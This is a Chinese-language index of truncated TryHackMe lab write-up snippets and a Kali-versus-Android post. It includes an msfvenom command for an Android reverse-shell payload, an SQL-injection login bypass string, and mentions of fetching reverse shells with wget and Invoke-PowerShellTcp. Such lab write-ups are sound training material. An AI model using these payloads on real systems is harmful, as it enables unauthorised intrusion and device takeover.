TryHackMe系列之overpass2hacked 当作为运营人员时，发现了异常并且抓到了流量包，此时就可以对pcap文件进行解析，溯源黑客的攻击过程。 输入http查看网页端访问流量： 右击选取追踪流TCP查看相应的http的访问：

浅试kali渗透安卓 生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=5556 R >

TryHackMe系列之daily bugle 信息收集 访问80端口： Joomlascan工具dirsearch扫描目录发现/administrator路径 同时也发现/README.txt,访问可以发现joom

TryHackMe系列之Skynet 信息收集 有smb服务，以及22、80端口 shell获取打开80端口，啥也没有 用diresearch扫描，发现目录/squirrelmail 访问： smb服务信息收集 使用nma

TryHackMe系列之Game Zone 信息收集 sql注入登录为单引号闭合，在账号框输入 'or 1=1 -- - 成功登录下一个界面，查询页面抓包，保存至burp.txt文件准备利用sqlmap进行注入攻击

TryHackMe系列之Hackpark 思路总结web查找漏洞突破web服务进入靶机获取普通shell，本地开启http服务，靶机利用shell wget下载msfconsole生成的反弹shell文件到temp文件夹，载入PEASS-n

TryHackMe系列之Alfred 思路总结JenKins项目创建选择window命令执行，写好攻击命令，选择build now 执行下载Invoke-PowerShellTcp.ps1脚本并执行获取普通shell，同样利用shell获取

TryHackMe系列之Steel Mountain ps：做了5次的靶场，每次都是因为靶场有问题导致要从开，来来回回将近2个半小时 信息收集先nmap扫描靶机： 两个web服务8080、80端口 Rejetto：CVE-2014-628

TryHackMe系列之Kenobi ps:找到的国外渗透靶场，花了我点小米，看起来对新手较为的友好，里面有较为完整的学习渗透路径 接下来就是长期的更新和学习，Fighting！ 知识点本次挑战涵盖的主题： nmap端口扫描+脚本枚举服